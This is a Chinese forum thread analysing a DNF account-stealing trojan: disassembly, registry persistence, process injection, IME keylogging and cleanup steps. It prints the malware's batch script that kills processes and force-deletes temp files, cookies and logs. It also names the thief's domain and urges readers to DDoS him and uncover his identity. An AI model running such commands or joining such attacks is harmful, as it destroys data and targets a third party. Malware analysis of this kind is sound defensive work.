【大牛飞过就好】一款DNF盗号分析【初步,未入CALL直接MD分析】
本帖最后由 Ssking 于 2015-4-14 16:27 编辑菜鸟所做,大神勿喷【初步,未入CALL直接MD分析】所以有些函数和作用并不相对应,我没仔细入CALL直接MD,你懂
首先PEiD查壳,这作者没加壳,直接OD载入分析
首先我先配置OD,直接用小生的Jiack的Strong保护Od
首先我检查了这个程序的基本信息:
Microsoft Visual C++ 6.0 但是有问题的,这个疑似程序有伪装
不过一看程序的图标,顿时放松了,是易语言的程序,这样就好办多了
PEiD提示疑似壳子,但是我用反文件扫描器,发现无壳
程序入口附近,更是确定这个是易语言
00447A81 >/$55 push ebp
00447A82|.8BEC mov ebp,esp
00447A84|.6A FF push -0x1
00447A86|.68 F041DE00 push GD一体【.00DE41F0
00447A8B|.68 BCC24400 push GD一体【.0044C2BC ;SE 处理程序安装
00447A90|.64:A1 0000000>mov eax,dword ptr fs:
00447A96|.50 push eax
00447A97|.64:8925 00000>mov dword ptr fs:,esp
00447A9E|.83EC 58 sub esp,0x58
00447AA1|.53 push ebx
00447AA2|.56 push esi
00447AA3|.57 push edi
00447AA4|.8965 E8 mov ,esp
00447AA7|.FF15 34734600 call dword ptr ds:[<&KERNEL32.GetVersion>;外挂的细节配置
00447AAD|.33D2 xor edx,edx ;ntdll.KiFastSystemCallRet
00447AAF|.8AD4 mov dl,ah
00447AB1|.8915 80ADE000 mov dword ptr ds:,edx ;ntdll.KiFastSystemCallRet
00447AB7|.8BC8 mov ecx,eax
00447AB9|.81E1 FF000000 and ecx,0xFF
00447ABF|.890D 7CADE000 mov dword ptr ds:,ecx
00447AC5|.C1E1 08 shl ecx,0x8
00447AC8|.03CA add ecx,edx ;ntdll.KiFastSystemCallRet
跟00447AA7的call发现开始写入ini文件,应该是外挂配置
0044C255/$33C0 xor eax,eax
0044C257|.6A 00 push 0x0 ; /MaximumSize = 0x0
0044C259|.394424 08 cmp dword ptr ss:,eax ; |
0044C25D|.68 00100000 push 0x1000 ; |InitialSize = 1000 (4096.)
0044C262|.0F94C0 sete al ; |
0044C265|.50 push eax ; |Flags = 0
0044C266|.FF15 E8714600 call dword ptr ds:[<&KERNEL32.HeapCreate>; \HeapCreate
…………………………………………众多无用代码掠过
0044C2AE|> \6A 01 push 0x1
0044C2B0|.58 pop eax ;GD一体【.00447ADF
0044C2B1\.C3 retn
这个CALL结尾,我们返回了
00447ADF|.59 pop ecx
ecx弹栈,应该开始其他操作
00447B07|.FF15 58734600 call dword ptr ds:[<&KERNEL32.GetCommand>; [GetCommandLineA
发现这个指令和函数。疑似内存操作
往下都是些无用操作。继续单步
00447B31|.50 push eax ; /pStartupinfo = 0012FF64
00447B32|.FF15 E4724600 call dword ptr ds:[<&KERNEL32.GetStartup>; \GetStartupInfoA
程序终于动了
00447B5C|.E8 DDDB0000 call GD一体【.0045573E重要操作,各种小CALL尽在此处
到现在我才发现,这个程序是一个解压的,但是这个CALL也一起把所有该做的都做了一遍
开始创建注册表项,HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\SRDSL
此后写入具体值。
HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\SRDSL\Start
并且开始安装驱动了,具体CALL没有跟进,但是为那个外挂盗号提供了便捷。
最后在根目录生成一个 gb.exe和一个bat文件
终于开始具体操作了
这一个CALL内应该有很多的小CALL,以上行为完毕后,自动调用一个远的call开始下一步行动
暴露了他的盗号本性
直接修改核心注册表
具体如下
HEKY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\SRDSL\ImagePath
具体的值便是 很危险的了。直接获取ROOT权限(最高权限),注入Svchost.exe 获取最高
在SVCHOST.EXE后加入-k "SRDSL"此前也是先建立这个目录写入值,现在开始具体操作了,直接调用。
然后创建money.dll,应该是外挂的相关功能
然后直接向csrss远程注入代码,获取csrss.exe的权限
又开始向原先的SRDSL注册表项开始写入一个新的值,是一个随应用启动的dll,便于程序随机启动
这个程序居然又调用CMD开始删除原先的GB.EXE
最后又开始向输入法开始进攻,我的输入法直接挂掉,只能用微软的输入法慢慢码字了
终于发现他的重要操作了,也是最终目的,利用刚才的攻击,拿下输入法,这样就可以利用comime.exe开始键盘记录了
00447B55|.FF15 4C734600 call dword ptr ds:[<&KERNEL32.GetModuleH>; \GetModuleHandleA
00447B5B|.50 push eax
00447B5C|.E8 DDDB0000 call GD一体【.0045573E ;重要操作部位,大家可以线下自己跟,发现很多操作和函数
00447B61|.8945 A0 mov ,eax
00447B64|.50 push eax
00447B65|.E8 0E300000 call GD一体【.0044AB78
00447B6A|.8B45 EC mov eax,
00447B6D|.8B08 mov ecx,dword ptr ds:
00447B6F|.8B09 mov ecx,dword ptr ds: ;ntdll.7C92DCBA
00447B71|.894D 98 mov ,ecx
00447B74|.50 push eax
00447B75|.51 push ecx
00447B76|.E8 D33C0000 call GD一体【.0044B84E
00447B7B|.59 pop ecx ;kernel32.7C817077
00447B7C|.59 pop ecx ;kernel32.7C817077
00447B7D\.C3 retn 此程序结尾,你就要开始运行外挂了
外挂的功能相对于盗号就少了许多,直接跟上上一个程序的操作,截取你的信息直接远程发送到盗号者的电脑上
解决办法,断网全面杀毒然后删除,安全模式或者PE,普通模式无效
HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\SRDSL和相关的所有注册表,对系统文件进行替换修复
弄完了准备打包一下来着,瞄了一眼发现一个bat
直接文本打开,发现@Rasdial 宽带连接 123 123
这个代码具体是啥自己猜吧
还有一个bat很阴险,代码如下
@echo off
taskkill /f /im Crossproxy.exe
taskkill /f /im tgp_gamead.exe
taskkill /f /im Tencentdl.exe
taskkill /f /im Client.exe
taskkill /f /im DNFchina.exe
taskkill /f /im QQDL.exe
taskkill /f /im QQLogin.exe
taskkill /f /im TenSafe.exe
taskkill /f /im DNFchinaTest.exe
taskkill /f /im DNFchina.exe
taskkill /f /im TXPlatform.exe
taskkill /f /im DNF.exe
taskkill /f /im AdvertDialog.exe
taskkill /f /im IEXPLORE.EXE
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "TEMP%\*.*"
del /f /s /q "%TMP%\*.*"
del /f /s /q %userprofile%\recent\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
exit
仔细阅读就会发现,我草,tmd阴,还会扫尾。
打开外挂程序也会发现一些可以操作,但是大部分都是在解压程序身上。
菜鸟所做,大神勿喷
样本来源http://www.52pojie.cn/thread-351364-1-1.html
最后附上小黑的动态域名:guoqi518.vicp.cc 如果想黑他,下载DDOS工具,解析下域名直接D他
以及地理位置 上海市
具体大家社工,我技术有限。
支持一下,有点看懂了
Ssking 发表于 2015-4-13 17:07
哦哦哦,有人反馈中毒了吗?
我用了很长时间,没有中毒就是了,不过看者360提示,怪难受的。 聆听. 发表于 2015-4-13 16:55
大牛、求分析 http://www.52pojie.cn/thread-347398-1-1.html 这是我的另一篇帖子。刚开始我不知道。后来中 ...
哦哦哦,有人反馈中毒了吗? 大牛、求分析 http://www.52pojie.cn/thread-347398-1-1.html 这是我的另一篇帖子。刚开始我不知道。后来中了一次毒,就安装了大数字,大数字反馈这个加速器获取QQKEY。也有人留言反馈了。求大牛分析、 大牛 苏紫方璇 发表于 2015-4-13 21:07
00447AA7|.FF15 34734600 call dword ptr ds:[;外挂的细节配置
GetVersion基本上是每个程序的入口点 ...
我是用HIPS,你懂得,新手必备分析器哇哈哈 苏紫方璇 发表于 2015-4-13 21:07
00447AA7|.FF15 34734600 call dword ptr ds:[;外挂的细节配置
GetVersion基本上是每个程序的入口点 ...
首先,这个是调用call,具体问题你说的不对,下一个绝对有内存读取,你自己下样本去分析下,我分析的无错,还有这个不能看od注释。
有什么错误请指出
最后,我分析木马不是看注释这种水平 {:1_921:}很赞耶这么赞怎么没人? 00447AA7|.FF15 34734600 call dword ptr ds:[<&KERNEL32.GetVersion>;外挂的细节配置
GetVersion基本上是每个程序的入口点都有的
00447B07|.FF15 58734600 call dword ptr ds:[<&KERNEL32.GetCommand>; [GetCommandLineA发现这个指令和函数。疑似内存操作
GetCommand是获取启动的命令行 聆听. 发表于 2015-4-13 17:42
我用了很长时间,没有中毒就是了,不过看者360提示,怪难受的。
截图我看下,没必要分析就不用分析了,我是菜鸟。 大神,能找到盗号者的信息吗?不胜感激 ilvc12 发表于 2015-4-13 19:16
大神,能找到盗号者的信息吗?不胜感激
没去具体分析连接者,技术问题,我不是大神哈,我是菜菜。我只会列出解决办法和问题所在,因为我只分析了行为。 非常感谢,入门很需要 努力学习中!!
页:
[1]
2